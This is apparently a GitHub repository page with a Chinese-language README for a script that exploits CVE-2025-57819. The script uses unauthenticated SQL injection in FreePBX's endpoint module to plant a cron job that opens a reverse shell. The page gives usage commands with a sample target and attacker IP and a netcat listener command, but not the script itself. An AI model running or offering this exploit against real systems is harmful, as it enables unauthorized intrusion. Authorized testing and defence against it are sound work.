Its1Zero/cve-2025-57819-exploit

GitHub: Its1Zero/cve-2025-57819-exploit

针对 FreePBX endpoint 模块 CVE-2025-57819 SQL 注入漏洞的自动化利用脚本,通过注入 cron 定时任务直接获取反弹 shell。

Stars: 0 | Forks: 0

# CVE-2025-57819 Exploit ## 元数据 - **严重性:** Critical (9.8) - **向量:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - **类型:** 未授权 SQL Injection → Remote Code Execution - **受影响软件:** FreePBX(endpoint 模块)`< 15.0.66`、`< 16.0.89` 和 `< 17.0.3` - **测试环境:** CentOS 7 上基于 Apache 2.4 的 FreePBX 16.0.40.7 ## 概述 此脚本利用易受攻击的 FreePBX endpoint 模块中的 [**CVE-2025-57819**](https://nvd.nist.gov/vuln/detail/cve-2025-57819)。该漏洞允许进行 SQL injection,进而被利用来注入恶意 cron job。 与其他公开的 exploit 不同,它_无需_通过上传的 webshell 与目标进行交互等额外步骤。这是一种直接的方法,将直接为您带来 reverse shell 访问权限。 ## 影响 通过 SQL injection 和 cron job 操纵可实现 remote code execution。成功利用此漏洞将在目标系统上获取 reverse shell。根据具体配置,这可能导致系统被完全攻陷。 ## 功能 - 通过易受攻击的 AJAX endpoint 进行 SQL injection - 自动生成 reverse shell payload - 通过每分钟执行一次(`* * * * *`)的计划任务实现 cron job 持久化 - 自动清理注入的 cron job - 使用十六进制编码的 payload,因为当 `+` 字符被解析为空格时,`base64` payload 会被破坏。 ## 用法 通过提供目标和监听器配置来运行此 exploit: ``` python3 cve-2025-57819.py ``` #### 参数 - ``:目标主机名或 IP 地址(易受攻击的 FreePBX 实例) - ``:用于 reverse shell callback 的攻击者 IP 地址 - ``:用于接收传入连接的监听端口 #### 示例: ``` python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999 ``` ## 监听器设置 在执行 exploit 之前启动监听器: ``` nc -lvnp ``` #### 示例: ``` nc -nlvp 9999 ``` ## 免责声明 此工具仅供教育目的和授权的安全测试使用。未经明确许可对系统进行未经授权的使用是非法的。作者对因滥用此工具或由此造成的任何损害不承担任何责任。 ## 作者 Its1Zero - ic47@protonmail.com ## 参考 - https://nvd.nist.gov/vuln/detail/cve-2025-57819 - https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h - https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
标签:CISA项目, PNNL实验室, 编程工具, 远程代码执行, 逆向工具